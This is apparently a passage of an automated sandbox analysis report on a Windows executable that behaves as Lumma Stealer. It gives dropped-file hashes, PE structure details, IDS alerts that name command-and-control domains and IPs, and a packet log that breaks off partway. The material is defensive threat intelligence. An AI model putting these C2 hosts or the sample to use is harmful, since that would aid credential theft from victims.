Entropy (8bit):	0.9569002406812802
Encrypted:	false
SSDEEP:	192:l37VPZmrM0VtBLMju3RzuiFiZ24IO8tS:TZ6VtB4jgzuiFiY4IO8tS
MD5:	3AB10E8B2A2797149DB591EC081810B1
SHA1:	6E970F679041F530A92FB62E2390F8F5362B3A16
SHA-256:	BCCA3F0B952CA4137B779BF2B0301050DE8FFBD80CB3D3823711068745146F53
SHA-512:	9C8BD31D39ABDDBA8E6B12A50E0F46C3F977CDA57AD16FE3F17451B16F40F628F7D22EE86D247B8F16665BAFE9E421E64B976712E445AD042F57E8439BE68670
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.7.2.4.6.2.0.9.8.9.8.3.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.7.2.4.6.2.1.4.8.9.8.3.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.4.f.1.0.6.d.-.f.e.5.9.-.4.5.2.6.-.a.a.6.f.-.4.0.0.6.b.8.b.2.b.a.6.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.e.e.1.5.f.9.-.2.3.0.3.-.4.6.a.9.-.9.8.b.3.-.9.1.6.4.1.e.0.a.7.2.d.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.5.7.5.9...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.1.c.-.0.0.0.1.-.0.0.1.4.-.2.4.0.e.-.0.0.9.d.c.a.4.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.2.3.d.3.f.b.8.f.7.6.4.d.c.5.5.4.c.3.9.5.c.c.6.e.6.b.a.9.8.8.1.0.0.0.0.f.f.f.f.!.0.0.0.0.4.a.2.0.9.5.6.9.0.b.a.8.f.1.3.2.5.d.d.1.0.1.6.7.3.1.8.7.2.8.4.4.7.d.1.2.0.5.8.a.!.5.7.5.9...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER65D0.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sun Dec 15 08:23:41 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	46046
Entropy (8bit):	2.56179267339005
Encrypted:	false
SSDEEP:	192:rVuUXQzg2rKbROx1BWwliLZXLtM1z8T3AGrBlFG0zrlguJ4wb4QP:pYzg2ubETBTliLItXUi0NgscQP
MD5:	FD3F8A512B8E18B8C38421F020199F43
SHA1:	D1B743A54AC587E54382F3E91DE48AF7E496AACD
SHA-256:	7408110E5324985363141E2166517E64BE4D1906DCC532AFEEF263C230C9AFAA
SHA-512:	4EAB429395A5FAE9B8157F63AF34A79F47DB6EDEE4B25FAA8F39E9CF8817E892436D2C427AB9EAC8CFEB5E85410AA435B114F8AFD5B5305C56E0576B7CE52419
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........^g............4...............H...........<.......t....-..........`.......8...........T............@...s......................................................................................................eJ....... ......GenuineIntel............T.............^g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER66DA.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8288
Entropy (8bit):	3.6981763645833765
Encrypted:	false
SSDEEP:	192:R6l7wVeJNS6q6Ysx6I2gmf2jsoYJpD089btmsf+vm:R6lXJ46q6YC6RgmfTtttFfX
MD5:	91E26E8E5E5D5B1F90C89DBCDB5FED80
SHA1:	9E224D60BEDEDD56423A4930119F58F432A34365
SHA-256:	2B7AF19800E92F25F5DB9ED8B681046C8AAD48022E1B16B997F6E48EE1D0FA58
SHA-512:	BAEFF52F7F3A7DAFE428275F7166C8271ED2210162D939C69E00F963725134859F940D0ADF4AB921DE9F8ECB43B61BC93D21D8A352850C14BC16A74C6696F36B
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.6.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6739.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4565
Entropy (8bit):	4.442953089477176
Encrypted:	false
SSDEEP:	48:cvIwWl8zsIJg77aI9GmKdWpW8VYuYm8M4JH9xeFt+q8BfCO8lizird:uIjfOI7f77VmJmsUizird
MD5:	FD436F22427DCF6BD46E3084D90D2103
SHA1:	4F693DC8855DEC65746F329480D227CCEAAA3FAC
SHA-256:	B531D2DE85F4A6CB453DADD0866D5A1EB2B6CF334BA0D6830EE01612D2288489
SHA-512:	A03193E44969E83FE85382022846DA0E88D2DA1101BAD4B9CD9E7B97B92B8D274D4B6870581A2CDFCD338736550D5DCFB11FA15A35B24F34D64F6E8DC2954C6D
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="632126" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe

Download File

Process:	C:\Users\user\Desktop\wN8pQhRNnu.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	361984
Entropy (8bit):	6.633746849794654
Encrypted:	false
SSDEEP:	6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
MD5:	D88E2431ABAC06BDF0CD03C034B3E5E3
SHA1:	4A2095690BA8F1325DD10167318728447D12058A
SHA-256:	4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
SHA-512:	7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62%
Joe Sandbox View:	Filename: AZCFTWko2q.exe, Detection: malicious, Browse Filename: rHrG691f7q.exe, Detection: malicious, Browse Filename: TN78WX7nJU.exe, Detection: malicious, Browse Filename: XIaCqh1vRm.exe, Detection: malicious, Browse Filename: QQx0tdFC0b.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....2e......................?.....\.............@...........................C.............................................l)..P.....B.0............................................................................................................text...l........................... ..`.rdata..L".......$..................@..@.data.....=..@...p... ..............@....rsrc...0.....B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5759.tmp.exe

Download File

Process:	C:\Users\user\Desktop\wN8pQhRNnu.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	361984
Entropy (8bit):	6.633746849794654
Encrypted:	false
SSDEEP:	6144:alAD8SHVttaSqqwtsdu2S6Vfit5Ak+zDwHEjYWZuNCUS:alAZfqqwtuu2nivABAkMWm6
MD5:	D88E2431ABAC06BDF0CD03C034B3E5E3
SHA1:	4A2095690BA8F1325DD10167318728447D12058A
SHA-256:	4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
SHA-512:	7AA5317DCDF4343F1789E462F4B5D3D23F58E28B97C8C55FC4B3295BF0C26CFB5349B0A3543B05D6AF8FA2BC77F488A5ECE5EAACEAF5211FA98230EA9B7F49A7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62%
Joe Sandbox View:	Filename: AZCFTWko2q.exe, Detection: malicious, Browse Filename: rHrG691f7q.exe, Detection: malicious, Browse Filename: TN78WX7nJU.exe, Detection: malicious, Browse Filename: XIaCqh1vRm.exe, Detection: malicious, Browse Filename: QQx0tdFC0b.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S...S...S.....f.R...M.t.M...M.e.G...M.s.=...tj..Z...S... ...M.z.R...M.d.R...M.a.R...RichS...........PE..L.....2e......................?.....\.............@...........................C.............................................l)..P.....B.0............................................................................................................text...l........................... ..`.rdata..L".......$..................@..@.data.....=..@...p... ..............@....rsrc...0.....B.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465467496804718
Encrypted:	false
SSDEEP:	6144:5IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNLdwBCswSbg:KXD94+WlLZMM6YFHd+g
MD5:	0B25168D702E0C9264EC3211DCC0A63F
SHA1:	D3A67BFFA866E9A10047F389B3A654877A26000C
SHA-256:	15E54AB8C28F65E97213A089F280826F6EDCBA4CAD79DC8F11CCDF4501A44B01
SHA-512:	63C206232523F82FB9923E1DB0954FB77EC955677647B1D69D6196A17D95EB73BDFBCFDBAA40E0F262CCEB9DFD87443E7BA30E247EC4BD0A7E90924B2C4C254E
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.D...N.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.000494931724281
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	wN8pQhRNnu.exe
File size:	429'568 bytes
MD5:	1c8d14491c1d595f460ad1b654a10571
SHA1:	20648de7cefb55d694240883c61681caf97daec6
SHA256:	cffae7a05b1561e21f9b10774d2d4cc5dbf1f48deca140e6e11b8bc6b102e84b
SHA512:	716c52d4d824f5e34c6d4f6438e26750fa67261f00cf0f2655bcc309d0216fa23ee6f41d1ff6061aa03944f6fa325abd0efca0eeebfb84cad4ff8dd84631592a
SSDEEP:	6144:Ss5CSJy9SjEyqeB5raN3N6FNH8CfHexqYNVzqHYPVTiU:Ss4SOml5mNyMxWHa9iU
TLSH:	4C94E0117AFD9432E3FB86325D31E6D06A7BF8A32974924F2264265F1D712C2CA62343
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........[...[...[.....f.Z...E.t.E...E.e.O...E.s.5...\|j..R...[.../...E.z.Z...E.d.Z...E.a.Z...Rich[...........PE..L...qVpf...........

File Icon


Icon Hash:	46c7c30b0f4e0d59

Static PE Info

General

Entrypoint:	0x40185c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x66705671 [Mon Jun 17 15:29:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	7baa72d9ba8fcedcc3460f571d339af6

Entrypoint Preview

Instruction
call 00007FBE28BE83B6h
jmp 00007FBE28BE4A3Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00456C18h], eax
mov dword ptr [00456C14h], ecx
mov dword ptr [00456C10h], edx
mov dword ptr [00456C0Ch], ebx
mov dword ptr [00456C08h], esi
mov dword ptr [00456C04h], edi
mov word ptr [00456C30h], ss
mov word ptr [00456C24h], cs
mov word ptr [00456C00h], ds
mov word ptr [00456BFCh], es
mov word ptr [00456BF8h], fs
mov word ptr [00456BF4h], gs
pushfd
pop dword ptr [00456C28h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [00456C1Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00456C20h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [00456C2Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00456B68h], 00010001h
mov eax, dword ptr [00456C20h]
mov dword ptr [00456B1Ch], eax
mov dword ptr [00456B10h], C0000409h
mov dword ptr [00456B14h], 00000001h
mov eax, dword ptr [00454004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00454008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000BCh]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x529cc	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x431000	0xf5c0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x52528	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x51000	0x18c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4ff6c	0x50000	1b4455b95c537b396f856d6075cf4841	False	0.844622802734375	data	7.549145641916041	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x51000	0x22be	0x2400	fd6e16ff7e8fd53287e73abf991fc211	False	0.357421875	data	5.411226103901982	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x54000	0x3dc49c	0x7000	57f99abd97891e8c130e1474afd0fc2f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x431000	0xf5c0	0xf600	524617261f47820badeb659717e46532	False	0.5623253302845529	data	5.470235680592729	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x43c0c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.31023454157782515
RT_ICON	0x431610	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkmen	Turkmenistan	0.5189232409381663
RT_ICON	0x4324b8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkmen	Turkmenistan	0.5717509025270758
RT_ICON	0x432d60	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkmen	Turkmenistan	0.6105990783410138
RT_ICON	0x433428	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkmen	Turkmenistan	0.6502890173410405
RT_ICON	0x433990	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkmen	Turkmenistan	0.42147302904564315
RT_ICON	0x435f38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkmen	Turkmenistan	0.4910881801125704
RT_ICON	0x436fe0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkmen	Turkmenistan	0.48565573770491804
RT_ICON	0x437968	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkmen	Turkmenistan	0.5957446808510638
RT_ICON	0x437e48	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkmen	Turkmenistan	0.8256929637526652
RT_ICON	0x438cf0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkmen	Turkmenistan	0.8384476534296029
RT_ICON	0x439598	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkmen	Turkmenistan	0.7983870967741935
RT_ICON	0x439c60	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkmen	Turkmenistan	0.8424855491329479
RT_ICON	0x43a1c8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkmen	Turkmenistan	0.8325515947467167
RT_ICON	0x43b270	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkmen	Turkmenistan	0.8454918032786886
RT_ICON	0x43bbf8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkmen	Turkmenistan	0.8608156028368794
RT_STRING	0x43d140	0x4fe	data			0.43661971830985913
RT_STRING	0x43d640	0x66	data			0.6862745098039216
RT_STRING	0x43d6a8	0x776	data			0.42670157068062825
RT_STRING	0x43de20	0x54c	data			0.4476401179941003
RT_STRING	0x43e370	0x7e0	data			0.42162698412698413
RT_STRING	0x43eb50	0x6da	data			0.4298745724059293
RT_STRING	0x43f230	0x756	data			0.422790202342918
RT_STRING	0x43f988	0x63c	data			0.43796992481203006
RT_STRING	0x43ffc8	0x5f6	data			0.43905635648754915
RT_GROUP_CURSOR	0x43cf70	0x14	data			1.25
RT_GROUP_ICON	0x43c060	0x68	data	Turkmen	Turkmenistan	0.7115384615384616
RT_GROUP_ICON	0x437dd0	0x76	data	Turkmen	Turkmenistan	0.6610169491525424
RT_VERSION	0x43cf88	0x1b4	data			0.5711009174311926

Imports

DLL	Import
KERNEL32.dll	GetFileSize, SetLocaleInfoA, GetNumaProcessorNode, GetConsoleAliasA, InterlockedDecrement, SetDefaultCommConfigW, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetEnvironmentStrings, LoadLibraryW, GetVersionExW, DeleteVolumeMountPointW, GetTimeFormatW, GetFileAttributesW, GetStartupInfoA, SetLastError, UnregisterWait, SetFileAttributesA, BuildCommDCBW, ResetEvent, LoadLibraryA, Process32Next, LocalAlloc, AddAtomW, FoldStringW, GetModuleFileNameA, GetModuleHandleA, UpdateResourceW, WriteConsoleOutputAttribute, OpenFileMappingA, WriteProcessMemory, GetProcAddress, GetCommandLineW, CreateFileA, WriteConsoleW, GetLastError, HeapFree, MultiByteToWideChar, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, GetFileType, HeapSize, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, ReadFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP
USER32.dll	GetProcessDefaultLayout
GDI32.dll	GetBitmapBits

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkmen	Turkmenistan

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-15T09:23:23.381564+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49730	172.67.179.207	443	TCP
2024-12-15T09:23:25.079794+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49731	176.113.115.19	80	TCP
2024-12-15T09:23:29.942881+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.4	56160	1.1.1.1	53	UDP
2024-12-15T09:23:30.089118+0100	2058222	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)	1	192.168.2.4	53059	1.1.1.1	53	UDP
2024-12-15T09:23:31.466849+0100	2058223	ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)	1	192.168.2.4	49732	104.21.22.222	443	TCP
2024-12-15T09:23:31.466849+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.22.222	443	TCP
2024-12-15T09:23:33.667750+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49732	104.21.22.222	443	TCP
2024-12-15T09:23:33.667750+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	104.21.22.222	443	TCP
2024-12-15T09:23:33.671989+0100	2058214	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)	1	192.168.2.4	64826	1.1.1.1	53	UDP
2024-12-15T09:23:35.048478+0100	2058215	ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)	1	192.168.2.4	49733	104.21.16.1	443	TCP
2024-12-15T09:23:35.048478+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.16.1	443	TCP
2024-12-15T09:23:36.579198+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49733	104.21.16.1	443	TCP
2024-12-15T09:23:36.579198+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49733	104.21.16.1	443	TCP
2024-12-15T09:23:36.608312+0100	2058220	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)	1	192.168.2.4	57451	1.1.1.1	53	UDP
2024-12-15T09:23:36.750711+0100	2058218	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)	1	192.168.2.4	58921	1.1.1.1	53	UDP
2024-12-15T09:23:36.892588+0100	2058216	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)	1	192.168.2.4	53885	1.1.1.1	53	UDP
2024-12-15T09:23:37.040754+0100	2058236	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)	1	192.168.2.4	51917	1.1.1.1	53	UDP
2024-12-15T09:23:37.183846+0100	2058210	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)	1	192.168.2.4	61751	1.1.1.1	53	UDP
2024-12-15T09:23:37.326266+0100	2058226	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)	1	192.168.2.4	50660	1.1.1.1	53	UDP
2024-12-15T09:23:39.091432+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	23.55.153.106	443	TCP
2024-12-15T09:23:39.854083+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49736	23.55.153.106	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2024 09:23:21.413181067 CET	49730	443	192.168.2.4	172.67.179.207
Dec 15, 2024 09:23:21.413254023 CET	443	49730	172.67.179.207	192.168.2.4
Dec 15, 2024 09:23:21.413355112 CET	49730	443	192.168.2.4	172.67.179.207
Dec 15, 2024 09:23:21.469233036 CET	49730	443	192.168.2.4	172.67.179.207
Dec 15, 2024 09:23:21.469268084 CET	443	49730	172.67.179.207	192.168.2.4
Dec 15, 2024 09:23:22.687573910 CET	443	49730	172.67.179.207	192.168.2.4
Dec 15, 2024 09:23:22.687649965 CET	49730	443	192.168.2.4	172.67.179.207
Dec 15, 2024 09:23:22.803034067 CET	49730	443	192.168.2.4	172.67.179.207
Dec 15, 2024 09:23:22.803061008 CET	443	49730	172.67.179.207	192.168.2.4
Dec 15, 2024 09:23:22.803352118 CET	443	49730	172.67.179.207	192.168.2.4
Dec 15, 2024 09:23:22.803437948 CET	49730	443	192.168.2.4	172.67.179.207
Dec 15, 2024 09:23:22.864167929 CET	49730	443	192.168.2.4	172.67.179.207
Dec 15, 2024 09:23:22.907325029 CET	443	49730	172.67.179.207	192.168.2.4
Dec 15, 2024 09:23:23.381582975 CET	443	49730	172.67.179.207	192.168.2.4
Dec 15, 2024 09:23:23.381680012 CET	443	49730	172.67.179.207	192.168.2.4
Dec 15, 2024 09:23:23.381686926 CET	49730	443	192.168.2.4	172.67.179.207
Dec 15, 2024 09:23:23.381771088 CET	49730	443	192.168.2.4	172.67.179.207
Dec 15, 2024 09:23:23.392467022 CET	49730	443	192.168.2.4	172.67.179.207
Dec 15, 2024 09:23:23.392498016 CET	443	49730	172.67.179.207	192.168.2.4
Dec 15, 2024 09:23:23.392636061 CET	49730	443	192.168.2.4	172.67.179.207
Dec 15, 2024 09:23:23.392636061 CET	49730	443	192.168.2.4	172.67.179.207
Dec 15, 2024 09:23:23.613198042 CET	49731	80	192.168.2.4	176.113.115.19
